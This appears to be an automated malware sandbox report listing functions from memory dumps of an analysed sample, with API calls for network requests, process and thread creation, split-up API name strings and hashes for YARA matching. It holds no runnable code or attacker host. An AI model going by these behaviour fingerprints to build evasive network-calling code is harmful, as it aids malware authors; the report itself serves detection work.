Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 02A1F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1F9FB

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 02A1F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1F90E

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FEDB

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FFBF

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FC6B

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FD9A

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FDCB

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 000988C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00098928

Strings

Open, xrefs: 000988E1
Requ, xrefs: 000988E8
HttpOpenRequestA, xrefs: 000988CD, 000988D0
estA, xrefs: 000988EF
HttpOpenRequestA, xrefs: 0009891A, 00098925
OpenRequestA, xrefs: 0009891E, 00098926
Http, xrefs: 000988DA
RequestA, xrefs: 00098922, 00098927

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: 762502e5ed30df253de9b50b2b9fb364ef68226fd93bd8ab2ed356d4edbdc2b0
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 2D01E5B2A05119AFCB14DF98D841DEF7BB9EB49210F158288FD48A7305D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 000988B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00098928

Strings

Open, xrefs: 000988E1
Requ, xrefs: 000988E8
HttpOpenRequestA, xrefs: 000988CD, 000988D0
estA, xrefs: 000988EF
HttpOpenRequestA, xrefs: 0009891A, 00098925
OpenRequestA, xrefs: 0009891E, 00098926
Http, xrefs: 000988DA
RequestA, xrefs: 00098922, 00098927

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction ID: eea4dab2842f887b0ba6774271eeabfe00d7545757ea5d3e3f5a853b6f0d4348
Opcode Fuzzy Hash: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction Fuzzy Hash: 810129B2905159AFCB14DF98C881DEF7BB9EF89210F158248FD18A7345C630ED10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00098836, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 50networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 000988A8

Strings

InternetConnectA, xrefs: 0009889A, 000988A5
Inte, xrefs: 0009885A
ectA, xrefs: 0009886F
rnetConnectA, xrefs: 0009889E, 000988A6
rnet, xrefs: 00098861
Conn, xrefs: 00098868
ConnectA, xrefs: 000988A2, 000988A7

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction ID: b001c5bfedcda0b3290eece724fc64022ae935b7401eec279cecb3375a115d29
Opcode Fuzzy Hash: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction Fuzzy Hash: 40011EB2905158AFCB14DF99D981EEF7BB9FB49310F158148FA08A7305C6309E10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00098840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 000988A8

Strings

InternetConnectA, xrefs: 0009889A, 000988A5
Inte, xrefs: 0009885A
ectA, xrefs: 0009886F
rnetConnectA, xrefs: 0009889E, 000988A6
rnet, xrefs: 00098861
Conn, xrefs: 00098868
ConnectA, xrefs: 000988A2, 000988A7

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 8f6f7ebeac24a301a0bd536727595a866ef0e1fffba8873a65153a093e8a3ce7
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: A401E9B2915118AFCB14DF99D941EEF77B9EB48310F158289BE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 000987D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00098827

Strings

A, xrefs: 000987FF
Inte, xrefs: 000987EA
rnetOpenA, xrefs: 00098821, 00098826
InternetOpenA, xrefs: 0009881D, 00098825
Open, xrefs: 000987F8
rnet, xrefs: 000987F1

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 4dcc09b29733cdce3652f0a2ad995d8c0ca5c8346c56c74469f42e0fcf8463e9
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 52F019B2901128AF8B14DF98DC419FBB7B8EF48310B048589BE18A7305D634AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 000987C8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00098827

Strings

A, xrefs: 000987FF
Inte, xrefs: 000987EA
rnetOpenA, xrefs: 00098821, 00098826
InternetOpenA, xrefs: 0009881D, 00098825
Open, xrefs: 000987F8
rnet, xrefs: 000987F1

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction ID: adf11703038de899c34c0856b49f7c5ba50ea2d8abc5dd64b665ffd69dd362d4
Opcode Fuzzy Hash: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction Fuzzy Hash: F1016DB2901129AFCB14DFA8D8859EF7BB9EF49310B048189FD54A7306D630AA11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00096ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096FC7, 00096F9F, 00096FAB, 00096FD3

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
Instruction ID: f1c0f75c24b2a73871ac5e316da53dcc4bb20ce7b951eba0c2d8916da526b308
Opcode Fuzzy Hash: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
Instruction Fuzzy Hash: E73190B1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A5B242D731B945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096F9F, 00096FAB

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 726b6fee09d3caee2e24f487463294dd982a4f10985aa744aa6e09ec356c7239
Instruction ID: 8dfb0b991cecd8f4896c39d154cf0aa770b7abe28cc964384e4570266f5fd647
Opcode Fuzzy Hash: 726b6fee09d3caee2e24f487463294dd982a4f10985aa744aa6e09ec356c7239
Instruction Fuzzy Hash: 5531A5B1601704ABCB11EF68D8A1FABBBF4FF84700F14816DF5195B282D371A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD

Strings

h, xrefs: 0009846C, 00098477

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: h
API String ID: 1279760036-818531735
Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction ID: 9c660ea016960cfc16c2869e1969f3ecf0bd967427e94b5868effca175dbbc07
Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction Fuzzy Hash: CCF062763002156FDB24EF98DC84EE7736DEF88360B108559FA4C9B301C931EA1587E0

Uniqueness

Uniqueness Score: -1.00%

Function 000984B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction ID: 42ec0936396e4c6d76417df5d5227a6e1b87530225a85a6626fdfbfa774ecdcf
Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction Fuzzy Hash: D1E06DB1200204ABDB14DF65CC49EA7376CAF88750F114199FE085B382D531E901CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5

Uniqueness

Uniqueness Score: -1.00%

Function 0009852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction ID: 0aaef4df04a51c728d33df8b1045f1b4a6e58cba5a1d384a3837a281c890649f
Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction Fuzzy Hash: 9E11E2B2204108ABCB14DF99DC80DEB77ADAF8D754F118258BA0D97242DA30E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00089B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00098530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00096FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction ID: f3ae7434a4c0fc32187fac2661d9e90ab096ce1ccd9d28c264ca8d2b19e71ba3
Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction Fuzzy Hash: 4BF0657328021077DB306658DC43FE77298DB95B50F250019F759AB2C2D995B90246E5

Uniqueness

Uniqueness Score: -1.00%

Function 00097000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: a2835ed8a1f02e86942637865c72b5d80b13372240ffd3b5ea69fe5af6331005
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 9CE06D333902043AE7306599AC02FE7B29C8B81B20F140026FB0DEA2C2D595F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00098480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
